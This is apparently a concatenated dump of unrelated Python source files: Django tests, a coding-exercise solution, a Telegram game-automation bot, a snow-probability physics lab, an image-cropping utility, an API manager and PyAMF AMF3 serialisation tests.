                 'organisation established in 1933-34 via the Agriculture ' \
                 'Marketing Act (1933). It brought stability and financial ' \
                 'security to dairy farmers by negotiating contracts with ' \
                 'milk purchasers on behalf of all 140,000 milk producers. ' \
                 'At a time of deep agricultural depression, when most ' \
                 'farming produce faced fierce competition from imports, ' \
                 'it contributed to a significant growth in UK dairy ' \
                 'farming.'
class TimelineSlideTestCase(TestCase):
    """Unit tests for the TimelineSlide serialisation helpers."""

    def setUp(self):
        # One slide spanning the whole of 1933.
        TimelineSlide.objects.create(
            unique_id='F001',
            start_date_year=1933,
            start_date_month=1,
            start_date_day=1,
            end_date_year=1933,
            end_date_month=12,
            end_date_day=1,
            headline=test_data_headline,
            text=test_data_text
        )

    def test_serialise_start_date(self):
        # Start date includes a display_date field.
        slide = TimelineSlide.objects.get(unique_id='F001')
        test_date = {'display_date': 1933, 'year': 1933, 'month': 1, 'day': 1}
        self.assertEqual(slide.serialise_start_date(), test_date)

    def test_serialise_end_date(self):
        # End date has no display_date field.
        slide = TimelineSlide.objects.get(unique_id='F001')
        test_date = {"year": 1933, 'month': 12, 'day': 1}
        self.assertEqual(slide.serialise_end_date(), test_date)

    def test_serialise_text(self):
        slide = TimelineSlide.objects.get(unique_id='F001')
        test_text = {
            "headline": test_data_headline,
            "text": test_data_text
        }
        self.assertEqual(slide.serialise_text(), test_text)

    def test_get_timeline_data(self):
        # Full TimelineJS payload for the slide, plus its JSON rendering.
        slide = TimelineSlide.objects.get(unique_id='F001')
        test_data = {}
        test_data['start_date'] = {"year": 1933, 'month': 1, 'day': 1,
                                   'display_date': 1933}
        test_data['display_date'] = "1933"
        test_data['end_date'] = {"year": 1933, 'month': 12, 'day': 1}
        test_data['text'] = {
            "headline": test_data_headline,
            "text": test_data_text
        }
        test_data['unique_id'] = 'F001'
        self.assertEqual(slide.get_timeline_data(), test_data)
        # test JSON conversion — compare lengths since key order may differ.
        self.assertEqual(len(slide.to_timeline_json()),
                         len(json.dumps(test_data)))
|
10,520 | de6e2f08858c68bb8a2d1a327e9459ed74f38f93 | from .models import *
from django import forms
def createHomePage(homePageForm):
    """Persist a HomePage built from *homePageForm* and return it.

    NOTE(review): exceptions are swallowed and only printed, in which case
    the function implicitly returns None — callers must handle that.
    """
    try:
        homePage = HomePage.saveFromForm(homePageForm)
        return homePage
    except Exception as e:
        print(e)
def createSiteInfos(siteInfoFormSet, homePage):
    """Create a SiteInfo row for every formset entry that carries an image."""
    for entry in siteInfoFormSet:
        data = entry.cleaned_data
        if not data['image']:
            continue
        info = SiteInfo(homePage=homePage,
                        image=data['image'],
                        text=data['text'])
        info.save()
|
10,521 | 90de9af7411d0a5ff230180b64feb7a2720eff51 | '''
#############################################################################################################
4. <<체육복>>
[문제 설명]
점심시간에 도둑이 들어, 일부 학생이 체육복을 도난당했습니다. 다행히 여벌 체육복이 있는 학생이 이들에게 체육복을 빌려주려 합니다. 학생들의 번호는 체격 순으로 매겨져 있어, 바로 앞번호의 학생이나 바로 뒷번호의 학생에게만 체육복을 빌려줄 수 있습니다. 예를 들어, 4번 학생은 3번 학생이나 5번 학생에게만 체육복을 빌려줄 수 있습니다. 체육복이 없으면 수업을 들을 수 없기 때문에 체육복을 적절히 빌려 최대한 많은 학생이 체육수업을 들어야 합니다.
전체 학생의 수 n, 체육복을 도난당한 학생들의 번호가 담긴 배열 lost, 여벌의 체육복을 가져온 학생들의 번호가 담긴 배열 reserve가 매개변수로 주어질 때, 체육수업을 들을 수 있는 학생의 최댓값을 return 하도록 solution 함수를 작성해주세요.
[제한사항]
전체 학생의 수는 2명 이상 30명 이하입니다.
체육복을 도난당한 학생의 수는 1명 이상 n명 이하이고 중복되는 번호는 없습니다.
여벌의 체육복을 가져온 학생의 수는 1명 이상 n명 이하이고 중복되는 번호는 없습니다.
여벌 체육복이 있는 학생만 다른 학생에게 체육복을 빌려줄 수 있습니다.
여벌 체육복을 가져온 학생이 체육복을 도난당했을 수 있습니다. 이때 이 학생은 체육복을 하나만 도난당했다고 가정하며, 남은 체육복이 하나이기에 다른 학생에게는 체육복을 빌려줄 수 없습니다.
[입출력 예]
n lost reserve return
5 [2, 4] [1, 3, 5] 5
5 [2, 4] [3] 4
3 [3] [1] 2
#############################################################################################################
'''
# First attempt — fails some test cases: the nested loops can count the same
# spare uniform as lending to several neighbours, and the size comparison
# between the two sets does not change which pairs are valid.
def solution(n, lost, reserve):
    save = []
    resetlost = set(lost) - set(reserve)
    # A student who brought a spare but was also robbed keeps it, so they
    # can neither lend nor need to borrow — drop them from both sets.
    resetreserve = set(reserve) - set(lost)
    if len(resetreserve) <= len(resetlost):
        for lostst in resetlost:
            for reservest in resetreserve:
                if lostst == reservest - 1 or lostst == reservest + 1:
                    save.append(reservest)
    else:
        for lostst in resetlost:
            for reservest in resetreserve:
                if reservest == lostst - 1 or reservest == lostst + 1:
                    save.append(lostst)
    # De-duplicate matched students before counting.
    a = len(list(set(save)))
    answer = n - len(lost) + a
    return answer
# Final solution: greedy lending over the de-duplicated sets.
def solution(n, lost, reserve):
    """Return the maximum number of students able to attend gym class.

    n       -- total number of students
    lost    -- student numbers whose uniform was stolen
    reserve -- student numbers who brought a spare uniform

    A student can only lend to an adjacent student number, and a robbed
    student who brought a spare keeps it for themselves.
    """
    still_lost = set(lost) - set(reserve)
    # A lender who was also robbed keeps their spare, so remove overlaps.
    lenders = set(reserve) - set(lost)
    # Fix: iterate lenders in ascending order. The original iterated the raw
    # set, whose order is implementation-defined; the lower-neighbour-first
    # greedy is only guaranteed optimal when lenders are processed sorted.
    for i in sorted(lenders):
        if i - 1 in still_lost:
            still_lost.remove(i - 1)
        elif i + 1 in still_lost:
            still_lost.remove(i + 1)
    return n - len(still_lost)
10,522 | 6a5f383bb338c6900ecbd539388acc1f1ad91e11 | from telethon import TelegramClient, sync, events
from telethon.tl.custom.conversation import Conversation
from random import randint
import asyncio
import cwCommonUtils
from cwConversation import ChatWarsConversation
# 🏰Castle ⚖Exchange 📦Stock 70 x 1000💰 [selling]
class ChatWarsHelper(dict):
    """Telethon-based helper that automates Chat Wars crafting and stock hiding.

    NOTE(review): subclasses dict and stores the client both as a dict entry
    and as an attribute — presumably for serialisation; confirm.
    """
    # Chat identifiers the helper talks to.
    chat_me = 'self'
    chat_apronhammer = 'apronhammer_bot'
    chat_chatwars = 'chtwrsbot'
    chat_api_testing = -329868035
    # Master switch: incoming messages are ignored while False.
    on = False

    def __init__(self, client):
        dict.__init__(self, client=client)
        self.client = client
        # Long-lived conversation with the Chat Wars bot.
        self.conversation = ChatWarsConversation(self.client, self.chat_chatwars)

    #async def Deposit?
    async def Craft(self, item_name, qtty):
        """Craft *qtty* of *item_name*, recursively crafting missing parts."""
        item_id = cwCommonUtils.GetItemId(item_name)
        result = await self.CraftRecursive(item_id, str(qtty))
        if result is True:
            print('Crafted: ' + item_name + ' x ' + str(qtty))
        else:
            print('NO PUDE CRAFTEAR')

    async def CraftRecursive(self, item_id, qtty):
        """Try to craft an item; when ingredients are missing, craft them first.

        Returns True on success, False when out of mana or on any failure
        (including an exception, which yields an implicit None — falsy).
        """
        try:
            response = (await self.conversation.sayCraft(item_id, qtty)).raw_text
            await asyncio.sleep(2)
            if cwCommonUtils.TestCraftResult(response) == 'REQUIRED':
                # Bot listed missing ingredients: craft each one, then report
                # success (the caller is expected to retry the parent craft).
                response = cwCommonUtils.GetRequiredItemsFromCraftResult(response, ' ')
                for requiered_item in response:
                    item_requiered_id = cwCommonUtils.GetItemIdFromCraftOrder(requiered_item)
                    item_requiered_qtty = cwCommonUtils.GetItemQttyFromCraftOrder(requiered_item)
                    required_craft_result = await self.CraftRecursive(item_requiered_id, item_requiered_qtty)
                    if required_craft_result == False: return False
                return True
            elif cwCommonUtils.TestCraftResult(response) == 'MANA':
                return False
            elif cwCommonUtils.TestCraftResult(response) == 'CRAFTED':
                return True
            return False
        except Exception as err:
            print('Error in CraftRecursive: ')
            print(str(err))

    async def Hide(self, item_name):
        """Stash the whole stock of *item_name* by listing it on the exchange.

        Any quantity already listed is withdrawn first so the new sell order
        covers inventory + previously hidden stock.
        """
        try:
            print('=> hiding: ' + item_name)
            item_quantity = await self.conversation.GetItemQuantity(item_name)
            print(item_name + ' to hide: ' + str(item_quantity))
            if item_quantity > 0:
                exchange = await self.conversation.GetExchange()
                remove_hash = await self.conversation.GetRemoveHashFromExchange(item_name, exchange)
                if remove_hash != None:  # visit the exchange once: get hidden quantity and the remove hash
                    hidden_quantity = await self.conversation.GetItemQuantityFromExchange(item_name, exchange)
                    print(item_name + ' already in exchange: ' + str(hidden_quantity))
                    removed = await self.conversation.RemoveItemFromExchange(remove_hash)
                    # NOTE(review): if the removal fails, total_quantity is
                    # never assigned and TryToSell below raises — confirm.
                    if removed:
                        total_quantity = item_quantity + hidden_quantity
                else:
                    print('no' + item_name + ' in exchange: ')
                    total_quantity = item_quantity
                await asyncio.sleep(2)
                await self.conversation.TryToSell(item_name, total_quantity)
        except Exception as err:
            print('Error in Hide: ')
            print(str(err))

    async def cwNewMessageHandler(self, event: events.NewMessage.Event):
        """Dispatch incoming Telegram messages to the helper's commands."""
        if self.on == False:
            return
        try:
            if event and event.chat:
                # Groups expose .title; users expose .username.
                chat_name = event.chat.title if hasattr(event.chat, 'title') else event.chat.username
                print('=> cwNewMessageHandler message from "' + str(chat_name) + '" :' + str(event.raw_text))
                if self.TestHideItem(str(event.raw_text), 'thread'):
                    await self.HideItem('thread')
                if self.TestCraftRecursive(str(event.raw_text)):
                    order = cwCommonUtils.GetItemFromOrder(str(event.raw_text), 'recursive')
                    item_id = cwCommonUtils.GetItemIdFromCraftOrder(order)
                    item_qtty = cwCommonUtils.GetItemQttyFromCraftOrder(order)
                    item_name = cwCommonUtils.GetItemName(item_id)
                    await self.Craft(item_name, item_qtty)
                if self.TestPota(str(event.raw_text), None):
                    await self.conversation.sayPota('/use_p13')  # mana
        except Exception as err:
            print('Error in cwNewMessageHandler: ')
            print(str(err))

    #async def HideHiddenItems(self):
    def TestHideItem(self, text, item_name):
        # True when *text* is a "hide <item>" command addressed to the helper.
        return cwCommonUtils.TestCommandInText(cwCommonUtils.startingCall + ['hide', item_name], text)

    def TestChangeItem(self, text, item_name):
        # True when *text* is a "shop change <item>" command.
        return cwCommonUtils.TestCommandInText(cwCommonUtils.startingCall + ['shop', 'change', item_name], text)

    def TestCraftRecursive(self, text):
        # True when *text* is a "craft recursive ..." command.
        return cwCommonUtils.TestCommandInText(cwCommonUtils.startingCall + ['craft', 'recursive'], text)

    def TestPota(self, text, item_name=None):
        # True when *text* is a "pota [item]" command; item is optional.
        if isinstance(item_name, str):
            return cwCommonUtils.TestCommandInText(cwCommonUtils.startingCall + ['pota', item_name], text)
        else:
            return cwCommonUtils.TestCommandInText(cwCommonUtils.startingCall + ['pota'], text)

    async def HideItem(self, item_name):
        # Thin alias kept for the message-handler call site.
        await self.Hide(item_name)
### TODO: cuando lee un 404 Not Found o el ¯\_(ツ)_/¯ en el chtwrsbot intenta corregir?
### TODO: -.,(@)-·¯
### TODO:
### TODO:
### TODO: |
10,523 | 4ed0cb5cbc58e596bb5467441082538c30993e01 | # -*- coding: utf-8 -*-
"""
Created on Tue Sep 22 11:25:28 2020
@author: Brendon McHugh
Question 1(b) of Lab03
Here, we use gaussian quadrature to calculate the
probability of blowing snow based on the average
hourly windspeed at 10m, the snow surface age
and the average hourly temperature.
"""
# Import numpy, matplotlib, gaussxw
import numpy as np
import matplotlib.pyplot as plt
from gaussxw import gaussxwab
def prob_blowing_snow(u10, Ta, th, N):
    """Probability of blowing snow via Gaussian quadrature.

    Integrates a Gaussian wind-speed distribution from 0 to *u10* (average
    hourly wind speed at 10 m), with mean and spread parameterised by the
    average hourly temperature *Ta* and snow surface age *th*, using *N*
    quadrature points.

    Returns the probability as a float (or array, when Ta is an array).
    """
    # Mean and standard deviation of the wind-speed distribution.
    mean_speed = 11.2 + 0.365*Ta + 0.00706*Ta**2 + 0.9*np.log(th)
    spread = 4.3 + 0.145*Ta + 0.00196*Ta**2

    def gaussian(u):
        # Unnormalised Gaussian evaluated at wind speed u.
        return np.exp(-(mean_speed - u)**2 / (2*spread**2))

    # Gaussian-quadrature nodes and weights on [0, u10].
    nodes, weights = gaussxwab(N, 0, u10)
    area = np.sum(weights * gaussian(nodes))
    # Normalise by the Gaussian's total mass to obtain a probability.
    return area / (np.sqrt(2*np.pi) * spread)
# Number of quadrature sample points
N = 100
# Values of u10 (wind speed) and th (snow age) to investigate
u10_vals = [6,8,10]
th_vals = [24,48,72]
# Temperature range to plot
Ta = np.linspace(-30, 10, 100)
# Array to store probability values
P_bs = np.zeros(len(Ta))
# Colours encode u10; line styles encode th
colours = ('r', 'g', 'b')
lines = ('.', '-', ':')
# Linear-scale plot of probability of blowing snow vs temperature
plt.figure()
for (u10, colour) in zip(u10_vals, colours):
    for (th, line) in zip(th_vals, lines):
        P_bs = prob_blowing_snow(u10, Ta, th, N)
        plot_str = colour + line
        plt.plot(Ta, P_bs, plot_str, label=r'$u_{10}$ = %.4f, $t_h$ = %.4f'%(u10, th))
plt.xlabel('Average Hourly Temperature (Degrees C)')
plt.ylabel('Probability of Blowing Snow')
plt.legend()
plt.grid(True)
plt.title('Probability of Blowing Snow vs Temperature')
plt.savefig('ProbSnow_Temp_1b')
# Same data on a log y-axis, to show the low-probability tail
plt.figure()
for (u10, colour) in zip(u10_vals, colours):
    for (th, line) in zip(th_vals, lines):
        P_bs = prob_blowing_snow(u10, Ta, th, N)
        plot_str = colour + line
        plt.semilogy(Ta, P_bs, plot_str, label=r'$u_{10}$ = %.4f, $t_h$ = %.4f'%(u10, th))
plt.xlabel('Average Hourly Temperature (Degrees C)')
plt.ylabel('Probability of Blowing Snow')
plt.legend()
plt.grid(True)
plt.title('Probability of Blowing Snow vs Temperature')
plt.savefig('ProbSnow_Temp_Semilogy_1b')
|
10,524 | 8ca05fa2f5e33923804ddc983bf9cdb183fa268a | from os import path
from cv2 import cv2
from Katna.image import Image
from glob import glob
import operator
from PIL import Image as pil
from util import conf
from util.log_it import get_logger
logger = get_logger(__name__)
# Shared Katna image-processing engine.
img_module = Image()
thumbnail_height = 180
thumbnail_width = 360
# Candidate crop aspect ratios: wide banners (3:1 .. 6:1) and thumbnails.
banner_ratios = [ '%d:1' % width for width in range(3,7)]
thumbnail_ratios = [ '4:3', '5:3']
# Per-content-type artwork preferences: the plain lists are accepted as-is
# (resized only); the *_order lists are the fallback files to smart-crop,
# tried in the listed order.
movie_thumbnails =['fanart.jpg']
movie_thumbnail_order = [
    'clearart.png',
    'logo.png',
    'folder.jpg',
    'poster.jpg',
    'disc.png'
]
movie_banners = [
    'logo.png'
]
movie_banner_order = [
    'fanart.jpg',
    'folder.jpg',
    'poster.jpg',
    'disc.png'
]
show_thumbnails = ['fanart.jpg']
show_thumbnail_order = [
    'clearart.png',
    'landscape.jpg',
    'logo.png',
    'banner.jpg',
    'folder.jpg',
    'poster.jpg',
    'disc.png'
]
show_banners = [
    'banner.jpg',
    'logo.png'
]
show_banner_order = [
    'clearart.png',
    'landscape.jpg',
    'fanart.jpg',
    'folder.jpg',
    'poster.jpg',
    'disc.png'
]
def process_images(content_root):
    """Generate banner and thumbnail assets for one piece of content.

    Picks the TV-show or movie artwork preference lists based on the
    content path, then produces one banner and one thumbnail.
    """
    output_path = content_root.replace(conf.FINAL_DIR, conf.ASSETS_DIR)
    images_file_path = content_root.replace(conf.FINAL_DIR, conf.ASSET_TMP_DIR)
    is_show = 'TV Shows' in images_file_path
    banners = show_banners if is_show else movie_banners
    banner_order = show_banner_order if is_show else movie_banner_order
    thumbs = show_thumbnails if is_show else movie_thumbnails
    thumb_order = show_thumbnail_order if is_show else movie_thumbnail_order
    process_type(images_file_path, banners, banner_order, output_path, banner_ratios, 'banner')
    process_type(images_file_path, thumbs, thumb_order, output_path, thumbnail_ratios, 'thumbnail')
def process_type(images_file_path, acceptable_pics, crop_pics, file_output_path, ratios, output_name):
    """Produce one output image (banner or thumbnail) for a content item.

    If one of *acceptable_pics* exists on disk it is simply resized;
    otherwise the best smart crop is chosen from whichever *crop_pics*
    exist, tried at each of *ratios*.
    """
    # First artwork file from the accepted list that actually exists, if any.
    accept_pic = next((path.join(images_file_path,img) for img in acceptable_pics if path.exists(path.join(images_file_path,img))), None)
    if accept_pic:
        logger.info('Found accepted %s - starting resize' % output_name)
        resize(accept_pic, file_output_path, output_name)
    else:
        logger.info('No accepted %s - starting crop' % output_name)
        cropable_pics = [ path.join(images_file_path,img) for img in crop_pics if path.exists(path.join(images_file_path,img))]
        crop_images(cropable_pics, ratios, file_output_path, output_name)
def resize(img_path, output_path, output_file_name):
    """Save *img_path* as <output_path>/<output_file_name>.<ext>.

    clearart/fanart sources are first downscaled to 32% of their original
    size; everything is re-encoded at quality 82 with optimisation.
    """
    image = pil.open(img_path)
    ext = img_path.split('.')[-1]
    if "clearart" in img_path or "fanart" in img_path:
        image = image.resize([int(0.32 * s) for s in image.size])
    image.save(path.join(output_path, '%s.%s' % (output_file_name, ext)), quality=82, optimize=True)
def crop_images(img_paths, ratios, file_output_path, file_output_name):
    """Smart-crop every candidate image at every ratio and keep the best.

    NOTE(review): if *img_paths* is empty, or Katna returns an empty crop
    list for the best-scoring entry, best_crop[1][0] below raises — confirm
    callers always pass at least one croppable image.
    """
    # One (path, crop_list) entry per image/ratio combination.
    crop_result = [ (img, img_module.crop_image_with_aspect(
        file_path=img,
        crop_aspect_ratio=ratio,
        num_of_crops=1,
        down_sample_factor=5
        )) for img in img_paths
        for ratio in ratios
    ]
    # Highest-scoring first crop wins; empty crop lists score 0.
    best_crop = max(crop_result, key=lambda res: res[1][0].score if res[1] else 0)
    logger.info('Best crop from %s' % best_crop[0])
    img_loaded = cv2.imread(best_crop[0])
    ext_pic = best_crop[0].split('.')[-1]
    img_module.save_crop_to_disk(best_crop[1][0], img_loaded,
        file_path=file_output_path,
        file_name= file_output_name,
        file_ext='.%s' % ext_pic,
        )
    # Re-save via PIL to apply the quality/optimize encoding settings.
    path_output = path.join(file_output_path, "%s.%s" % (file_output_name, ext_pic))
    image = pil.open(path_output)
    image.save(path.join(path_output), quality=82, optimize=True)
|
10,525 | 9f10849077f41f99fe45d9bf4a13432d663b1ca3 | from .q_learner import QLearner
from .coma_learner import COMALearner
# Maps learner-name strings (as referenced in configs) to learner classes.
REGISTRY = {
    "q_learner": QLearner,
    "coma_learner": COMALearner,
}
|
10,526 | a71561117c200d73ab93bc7e6ed61dff9c90a713 | from app.api.v2.managers.base_api_manager import BaseApiManager
from app.api.v2.responses import JsonHttpNotFound
class ContactApiManager(BaseApiManager):
    """API manager exposing the contact service's per-contact reports."""

    def __init__(self, data_svc, file_svc, contact_svc):
        super().__init__(data_svc=data_svc, file_svc=file_svc)
        self.contact_svc = contact_svc

    def get_contact_report(self, contact: str = None):
        """Return the report for *contact* (matched case-insensitively),
        raising a 404 when no report exists for that name."""
        key = contact.upper()
        try:
            return self.contact_svc.report[key]
        except KeyError:
            raise JsonHttpNotFound(f'Contact not found: {key}')

    def get_available_contact_reports(self):
        """List the contact names that currently have reports."""
        return [name for name in self.contact_svc.report]
|
10,527 | a74f40a5b793baab5efeea51a03788816c917c8e | import pygame
from display_object import *
class Actor(DisplayObject):
    """A game character: a DisplayObject augmented with RPG statistics,
    an inventory, movement bookkeeping and per-direction sprite slots."""

    def __init__(self, name, x_pos, y_pos, size, hp, mp, str, defense, mag, gold, moves, direction, max_moves, max_hp, visible, image_path):
        # Display-related state lives on the base class.
        DisplayObject.__init__(self, name, x_pos, y_pos, size, visible, image_path)
        # Combat statistics.  NOTE(review): the ``str`` parameter shadows
        # the builtin; name kept for caller compatibility.
        self.hp = hp
        self.max_hp = max_hp
        self.mp = mp
        self.str = str
        self.defense = defense
        self.mag = mag
        # Economy and carried items (inventory starts empty).
        self.gold = gold
        self.inventory = []
        # Movement bookkeeping.
        self.direction = direction
        self.moves = moves
        self.max_moves = max_moves
        # Directional sprites; presumably assigned later by a loader —
        # TODO confirm against callers.
        self.up_img = None
        self.down_img = None
        self.left_img = None
        self.right_img = None
|
10,528 | d4f5ded34c5f4ea2c282ff1329a9370b3d2f7c2b | # -*- coding: utf-8 -*-
#
# Copyright (c) The PyAMF Project.
# See LICENSE.txt for details.
"""
Tests for AMF3 Implementation.
@since: 0.1.0
"""
import unittest
import datetime
import pyamf
from pyamf import amf3, util, xml, python
from pyamf.tests.util import (
Spam, EncoderMixIn, DecoderMixIn, ClassCacheClearingTestCase)
class MockAlias(object):
    """Recording stub standing in for a class alias.

    Every call is logged as ``[args, kwargs]`` into the matching list
    attribute, and canned values (``static_attrs``, ``attrs``,
    ``expected_instance``) are returned so tests can assert on both the
    calls made and the data flow.
    """

    def __init__(self):
        # call logs
        self.get_attributes = []
        self.get_static_attrs = []
        self.apply_attrs = []
        self.create_instance = []
        # canned return values
        self.static_attrs = {}
        self.attrs = ({}, {})
        self.expected_instance = object()

    def getStaticAttrs(self, *args, **kwargs):
        """Log the call and return the canned static attrs."""
        self.get_static_attrs.append([args, kwargs])
        return self.static_attrs

    def getAttributes(self, *args, **kwargs):
        """Log the call and return the canned (static, dynamic) attrs."""
        self.get_attributes.append([args, kwargs])
        return self.attrs

    def createInstance(self, *args, **kwargs):
        """Log the call and return the pre-built expected instance."""
        self.create_instance.append([args, kwargs])
        return self.expected_instance

    def applyAttributes(self, *args, **kwargs):
        """Log the call; nothing is actually applied."""
        self.apply_attrs.append([args, kwargs])
class TypesTestCase(unittest.TestCase):
    """
    Tests the type mappings.
    """

    def test_types(self):
        # Each AMF3 type constant must map to its wire-format marker byte.
        expected_markers = (
            ('TYPE_UNDEFINED', b'\x00'),
            ('TYPE_NULL', b'\x01'),
            ('TYPE_BOOL_FALSE', b'\x02'),
            ('TYPE_BOOL_TRUE', b'\x03'),
            ('TYPE_INTEGER', b'\x04'),
            ('TYPE_NUMBER', b'\x05'),
            ('TYPE_STRING', b'\x06'),
            ('TYPE_XML', b'\x07'),
            ('TYPE_DATE', b'\x08'),
            ('TYPE_ARRAY', b'\x09'),
            ('TYPE_OBJECT', b'\x0a'),
            ('TYPE_XMLSTRING', b'\x0b'),
            ('TYPE_BYTEARRAY', b'\x0c'),
        )

        for name, marker in expected_markers:
            self.assertEqual(getattr(amf3, name), marker)
class ContextTestCase(ClassCacheClearingTestCase):
    """Tests for L{amf3.Context}, the reference tables (strings, objects,
    class definitions) that back AMF3's by-reference encoding."""

    def test_create(self):
        """A fresh context starts with empty string/class tables."""
        c = amf3.Context()

        self.assertEqual(c.strings, [])
        self.assertEqual(c.classes, {})
        self.assertEqual(len(c.strings), 0)
        self.assertEqual(len(c.classes), 0)

    def test_add_string(self):
        """Strings are indexed in insertion order; the empty string is never
        indexed (returns -1) and non-strings are rejected."""
        x = amf3.Context()
        y = b'abc'

        self.assertEqual(x.addString(y), 0)
        self.assertTrue(y in x.strings)
        self.assertEqual(len(x.strings), 1)

        self.assertEqual(x.addString(''), -1)

        self.assertRaises(TypeError, x.addString, 132)

    def test_add_class(self):
        """Class definitions are stored both by class and by index."""
        x = amf3.Context()

        alias = pyamf.register_class(Spam, 'spam.eggs')
        y = amf3.ClassDefinition(alias)

        self.assertEqual(x.addClass(y, Spam), 0)
        self.assertEqual(x.classes, {Spam: y})
        self.assertEqual(x.class_ref, {0: y})
        self.assertEqual(len(x.class_ref), 1)

    def test_clear(self):
        """clear() resets the string table."""
        x = amf3.Context()
        y = [1, 2, 3]

        x.addObject(y)
        x.addString('spameggs')
        x.clear()

        self.assertEqual(x.strings, [])
        self.assertEqual(len(x.strings), 0)
        self.assertFalse('spameggs' in x.strings)

    def test_get_by_reference(self):
        """Entries can be fetched back by their reference index; out-of-range
        indices yield None and non-int indices raise TypeError."""
        x = amf3.Context()
        y = [1, 2, 3]
        z = {'spam': 'eggs'}

        alias_spam = pyamf.register_class(Spam, 'spam.eggs')

        class Foo:
            pass

        class Bar:
            pass

        alias_foo = pyamf.register_class(Foo, 'foo.bar')

        a = amf3.ClassDefinition(alias_spam)
        b = amf3.ClassDefinition(alias_foo)

        x.addObject(y)
        x.addObject(z)
        x.addString(b'abc')
        x.addString(b'def')
        x.addClass(a, Foo)
        x.addClass(b, Bar)

        self.assertEqual(x.getObject(0), y)
        self.assertEqual(x.getObject(1), z)
        self.assertEqual(x.getObject(2), None)
        self.assertRaises(TypeError, x.getObject, b'')
        self.assertRaises(TypeError, x.getObject, 2.2323)

        self.assertEqual(x.getString(0), b'abc')
        self.assertEqual(x.getString(1), b'def')
        self.assertEqual(x.getString(2), None)
        self.assertRaises(TypeError, x.getString, b'')
        self.assertRaises(TypeError, x.getString, 2.2323)

        self.assertEqual(x.getClass(Foo), a)
        self.assertEqual(x.getClass(Bar), b)
        self.assertEqual(x.getClass(2), None)

        self.assertEqual(x.getClassByReference(0), a)
        self.assertEqual(x.getClassByReference(1), b)
        self.assertEqual(x.getClassByReference(2), None)

        self.assertEqual(x.getObject(2), None)
        self.assertEqual(x.getString(2), None)
        self.assertEqual(x.getClass(2), None)
        self.assertEqual(x.getClassByReference(2), None)

    def test_get_reference(self):
        """The inverse lookups (value -> index) return the stored index, or
        -1 / None for values that were never added."""
        x = amf3.Context()
        y = [1, 2, 3]
        z = {'spam': 'eggs'}

        spam_alias = pyamf.register_class(Spam, 'spam.eggs')

        class Foo:
            pass

        foo_alias = pyamf.register_class(Foo, 'foo.bar')

        a = amf3.ClassDefinition(spam_alias)
        b = amf3.ClassDefinition(foo_alias)

        ref1 = x.addObject(y)
        ref2 = x.addObject(z)
        x.addString(b'abc')
        x.addString(b'def')
        x.addClass(a, Spam)
        x.addClass(b, Foo)

        self.assertEqual(x.getObjectReference(y), ref1)
        self.assertEqual(x.getObjectReference(z), ref2)
        self.assertEqual(x.getObjectReference({}), -1)

        self.assertEqual(x.getStringReference(b'abc'), 0)
        self.assertEqual(x.getStringReference(b'def'), 1)
        self.assertEqual(x.getStringReference(b'asdfas'), -1)

        self.assertEqual(x.getClass(Spam), a)
        self.assertEqual(x.getClass(Foo), b)
        self.assertEqual(x.getClass(object()), None)
class ClassDefinitionTestCase(ClassCacheClearingTestCase):
    """Tests that L{amf3.ClassDefinition} derives the correct AMF3 trait
    encoding (0=static, 1=external, 2=dynamic) and attribute count from a
    class alias, compiling the alias as a side effect."""

    def setUp(self):
        ClassCacheClearingTestCase.setUp(self)

        # deferred alias: not compiled until a ClassDefinition is built
        self.alias = pyamf.ClassAlias(Spam, defer=True)

    def test_dynamic(self):
        """A plain alias yields a dynamic (encoding 2) definition."""
        self.assertFalse(self.alias.is_compiled())

        x = amf3.ClassDefinition(self.alias)

        self.assertTrue(x.alias is self.alias)
        self.assertEqual(x.encoding, 2)
        self.assertEqual(x.attr_len, 0)

        self.assertTrue(self.alias.is_compiled())

    def test_static(self):
        """Static-only attrs with dynamic=False yield encoding 0."""
        self.alias.static_attrs = ['foo', 'bar']
        self.alias.dynamic = False

        x = amf3.ClassDefinition(self.alias)

        self.assertTrue(x.alias is self.alias)
        self.assertEqual(x.encoding, 0)
        self.assertEqual(x.attr_len, 2)

    def test_mixed(self):
        """Static attrs on a dynamic alias stay encoding 2."""
        self.alias.static_attrs = ['foo', 'bar']

        x = amf3.ClassDefinition(self.alias)

        self.assertTrue(x.alias is self.alias)
        self.assertEqual(x.encoding, 2)
        self.assertEqual(x.attr_len, 2)

    def test_external(self):
        """Externalizable aliases yield encoding 1 and no attrs."""
        self.alias.external = True

        x = amf3.ClassDefinition(self.alias)

        self.assertTrue(x.alias is self.alias)
        self.assertEqual(x.encoding, 1)
        self.assertEqual(x.attr_len, 0)
class EncoderTestCase(ClassCacheClearingTestCase, EncoderMixIn):
    """
    Tests the output from the AMF3 L{Encoder<pyamf.amf3.Encoder>} class.

    Each test compares the encoder's byte output against the expected AMF3
    wire format (via C{assertEncoded} from C{EncoderMixIn}).
    """

    amf_type = pyamf.AMF3

    def setUp(self):
        ClassCacheClearingTestCase.setUp(self)
        EncoderMixIn.setUp(self)

    def test_list_references(self):
        """Re-encoding the same list emits a 2-byte reference."""
        y = [0, 1, 2, 3]

        self.assertEncoded(y, b'\x09\x09\x01\x04\x00\x04\x01\x04\x02\x04\x03')
        self.assertEncoded(y, b'\x09\x00', clear=False)
        self.assertEncoded(y, b'\x09\x00', clear=False)

    def test_list_proxy_references(self):
        """With use_proxies, lists are wrapped in flex ArrayCollection."""
        self.encoder.use_proxies = True
        y = [0, 1, 2, 3]

        self.assertEncoded(
            y,
            b'\n\x07Cflex.messaging.io.ArrayCollection\t\t\x01\x04\x00\x04\x01'
            b'\x04\x02\x04\x03'
        )
        self.assertEncoded(y, b'\n\x00', clear=False)
        self.assertEncoded(y, b'\n\x00', clear=False)

    def test_dict(self):
        # multi-key dicts: attribute order is not guaranteed, so the
        # expected output lists the acceptable per-key fragments
        self.assertEncoded({'spam': 'eggs'}, b'\n\x0b\x01\tspam\x06\teggs\x01')
        self.assertEncoded(
            {'a': u'e', 'b': u'f', 'c': u'g', 'd': u'h'},
            b'\n\x0b\x01', (
                b'\x03c\x06\x03g',
                b'\x03b\x06\x03f',
                b'\x03a\x06\x03e',
                b'\x03d\x06\x03h'
            ),
            b'\x01'
        )

        self.assertEncoded({12: True, 42: "Testing"},
            b'\n\x0b\x01',
            (
                b'\x0512\x03',
                b'\x0542\x06\x0fTesting',
            ),
            b'\x01')

    def test_boolean(self):
        self.assertEncoded(True, b'\x03')
        self.assertEncoded(False, b'\x02')

    def test_mixed_array(self):
        """MixedArrays encode as AMF3 arrays with both an associative
        (string-keyed) part and a dense (int-keyed) part."""
        x = pyamf.MixedArray()
        x.update({0: u'hello', 'spam': u'eggs'})

